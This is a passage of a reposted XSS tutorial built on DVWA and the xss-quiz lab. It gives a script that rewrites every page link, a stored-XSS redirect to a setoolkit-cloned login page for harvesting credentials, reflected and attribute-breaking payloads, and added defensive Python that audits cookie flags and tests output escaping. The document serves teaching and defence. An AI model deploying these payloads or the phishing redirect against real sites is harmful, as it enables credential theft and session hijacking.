Actions possible after hijacking the session:

  • read page data
  • hijack front-end logic
  • send requests
  • steal user data
  • steal user passwords and login state
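The hijack above works only because the PHPSESSID cookie was readable by injected script and accepted without further checks. As an added example (not DVWA's or the author's code; the session-cookie names and the sample headers are constructed), this Python function audits Set-Cookie headers for the HttpOnly, Secure and SameSite attributes that limit what a stolen cookie can do:

```python
# Names commonly used for the session cookie (assumed list; extend for your own applications).
SESSION_NAMES = {"phpsessid", "jsessionid", "asp.net_sessionid", "sessionid", "session"}


def parse_set_cookie(header):
    """Split one Set-Cookie header into (name, value, attributes).
    Attribute keys are lower-cased; flag attributes such as HttpOnly map to True."""
    parts = [p.strip() for p in header.split(";")]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        if not part:
            continue
        key, has_value, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip() if has_value else True
    return name.strip(), value.strip(), attrs


def audit_cookie(header, served_over_https=True):
    """Report the missing attributes that let a stolen-cookie XSS reuse this cookie."""
    name, _value, attrs = parse_set_cookie(header)
    findings = []
    if "httponly" not in attrs:
        # Without HttpOnly, injected script can read the cookie via document.cookie,
        # which is exactly what the reflected-XSS test above relied on.
        findings.append("missing HttpOnly")
    if served_over_https and "secure" not in attrs:
        findings.append("missing Secure")
    samesite = attrs.get("samesite")
    if samesite is None or samesite is True:
        findings.append("missing SameSite")
    elif samesite.lower() == "none" and "secure" not in attrs:
        findings.append("SameSite=None without Secure")
    is_session = name.lower() in SESSION_NAMES
    return {
        "cookie": name,
        "session_cookie": is_session,
        "findings": findings,
        # A script-readable session cookie is the case that leads straight to session hijacking.
        "severity": "high" if is_session and findings else ("low" if findings else "ok"),
    }


def audit_response_headers(set_cookie_headers, served_over_https=True):
    return [audit_cookie(h, served_over_https) for h in set_cookie_headers]


# Constructed Set-Cookie headers: the first two are shaped like a default PHP login
# response, the third is what a hardened configuration should send.
SAMPLE_HEADERS = [
    "PHPSESSID=constructed-session-id; path=/",
    "security=low; path=/",
    "PHPSESSID=constructed-session-id; Path=/; HttpOnly; Secure; SameSite=Lax",
]


if __name__ == "__main__":
    for report in audit_response_headers(SAMPLE_HEADERS):
        print(report)
```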

III. Tampering with page links and stealing user information via XSS

1. Tampering with page links via XSS

The following JS code modifies the links on a page:

<script>
window.onload = function(){
    // Rewrite the href of every <a> element on the page
    var link = document.getElementsByTagName("a");
    for(var j = 0; j < link.length; j++){
        link[j].href = "http://www.baidu.com";
    }
}
</script>

Test as follows:

[Image: XSS distort-link test]

Clearly all of the friendly links have been tampered with and changed to the link the attacker wants visited.
Many Weibo or blog traffic-boosting schemes may rely on this principle.

Generating a malicious link with beef-xss

Example:

[Image: XSS beef-xss test]

2. How XSS is used to steal user information

Clone the site's login page and use stored XSS to plant redirect code; any user who visits is redirected to the cloned login page, and the account and password they enter are stored.
The basic principle:
[Image: principle of stealing user information via XSS]

Cloning a site with setoolkit

Steps:

  • Enter setoolkit in the Kali terminal
    • Social-Engineering Attacks > 1
    • Website Attack Vectors > 2
    • Credential Harvester Attack Method > 3
    • Site Cloner > 2
  • Use stored XSS to redirect to the cloned site
  • Execute the following in DVWA's XSS (Stored) page:

    <script>window.location = "http://192.168.xxx.xxx/";</script>

An example of cloning with setoolkit:

[Image: XSS setoolkit test]

IV. XSS attacks

1. Lab environment

Address:
https://xss-quiz.int21h.jp/
The page looks like this:
[Image: xss-quiz page]

2. Procedure for probing XSS:

  • Construct a string that will not be recognised as malicious code and submit it to the page
  • Use the browser's inspector to review the page source and check whether the constructed string appears in it

3. Exploiting XSS by closing a text tag

The principle is closing the tag.

Simple payload

Example:

<script>alert(document.domain);</script>

Tag-closing payload

Example:

"</b><script>alert(document.domain);</script>

Testing the simple payload and the tag-closing payload:
[Image: XSS attack tag test]

4. Configuring Chrome to disable the XSS Auditor

When visiting https://xss-quiz.int21h.jp/ for testing, the situation shown below may occur:
[Image: Chrome XSS Auditor]
Solution:
Configure Chrome with --args --disable-xss-auditor, as follows:
Create a new Chrome shortcut on the desktop, right-click it and open Properties, append --args --disable-xss-auditor to the Target field, then confirm and save:
[Image: Chrome configured with --args --disable-xss-auditor]

5. Finding XSS in attributes

Tips:
Use Ctrl+F to search the whole page for the submitted string;
close the quote and the angle bracket, then introduce a script tag, for example:

123"><script>alert(document.domain);</script>

The onmouseover event triggers the popup when the mouse hovers, for example:

" onmouseover=alert(document.domain)>

Test:
[Image: XSS attack attribute test]
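Whether these payloads execute depends on the context the input is written into, and the fix is encoding for that context. As an added example (not the quiz's or the author's code; the renderers and the test harness are constructed), the following Python renders the payloads from this section in several output contexts and parses the result with the standard-library HTML parser to see whether a script element or on* handler survives; the unquoted-attribute case shows where escaping alone is not enough:

```python
import html
from html.parser import HTMLParser

# The payloads shown in this section, reused here as constructed test input.
PAYLOADS = [
    "<script>alert(document.domain);</script>",
    "\"</b><script>alert(document.domain);</script>",
    "123\"><script>alert(document.domain);</script>",
    "\" onmouseover=alert(document.domain)>",
]


def render_raw(user_input):
    """No encoding: the vulnerable pattern the quiz pages reproduce."""
    return "<b>" + user_input + "</b>"


def render_text(user_input):
    """Text-node context: escaping < > & keeps '</b><script>' as literal text."""
    return "<b>" + html.escape(user_input, quote=False) + "</b>"


def render_attr_quoted(user_input):
    """Quoted-attribute context: quote=True also escapes \" and ', so the value cannot
    close the attribute and smuggle in onmouseover=... or a closing '>'."""
    return '<input type="text" value="' + html.escape(user_input, quote=True) + '">'


def render_attr_unquoted_broken(user_input):
    """Unquoted attribute: escaping alone is NOT enough, because a space ends the value
    and the rest of the input is parsed as new attributes. Kept as the failure case."""
    return "<input type=text value=" + html.escape(user_input, quote=True) + ">"


class InjectionDetector(HTMLParser):
    """Parse the rendered markup the way a browser would and record anything executable."""

    def __init__(self):
        super().__init__()
        self.hits = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.hits.append("script element")
        for name, _value in attrs:
            if name.startswith("on"):
                self.hits.append("event handler attribute " + name)


def injected(markup):
    """Return the list of executable constructs found in the rendered markup."""
    detector = InjectionDetector()
    detector.feed(markup)
    detector.close()
    return detector.hits


def demo():
    """For each renderer: does any of the page's payloads end up executable?"""
    renderers = {
        "raw": render_raw,
        "text_escaped": render_text,
        "attr_quoted_escaped": render_attr_quoted,
        "attr_unquoted_escaped": render_attr_unquoted_broken,
    }
    return {name: any(injected(render(p)) for p in PAYLOADS) for name, render in renderers.items()}


if __name__ == "__main__":
    for context, vulnerable in demo().items():
        print(f"{context}: {'INJECTED' if vulnerable else 'safe'}")
```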


Reposted from blog.csdn.net/CUFEECR/article/details/104839077